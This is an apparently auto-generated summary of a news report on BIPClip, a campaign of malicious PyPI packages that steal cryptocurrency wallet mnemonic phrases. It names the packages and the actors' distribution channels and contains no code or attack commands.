March 12, 2024 at 08:27AM
Threat hunters have discovered a set of seven malicious packages on PyPI, targeting cryptocurrency wallets by stealing BIP39 mnemonic phrases. The campaign codenamed BIPClip has been active since December 2022 and has raised concerns about supply chain attacks on crypto assets. The attackers have been careful in crafting the packages to avoid detection.
Based on the meeting notes, the key takeaways are:
1. The software supply chain attack campaign named BIPClip targeted cryptocurrency wallets by using packages on the Python Package Index (PyPI).
2. The campaign, active since December 4, 2022, carefully disguised malicious functionality within certain packages, including mnemonic_to_address, public-address-generator, and erc20-scanner, to exfiltrate mnemonic phrases.
3. The package hashdecrypts contains near-identical code to harvest data and references a GitHub profile named “HashSnake,” indicating a prolonged campaign.
4. Threat actors behind the campaign maintain a presence on Telegram and YouTube, using legitimate services like GitHub as conduits to distribute malware.
5. Abandoned projects within open-source repositories serve as attractive vectors for threat actors to publish trojanized versions, potentially leading to large-scale supply chain attacks.
This summary provides a clear overview of the main points discussed in the meeting notes regarding the BIPClip software supply chain attack campaign.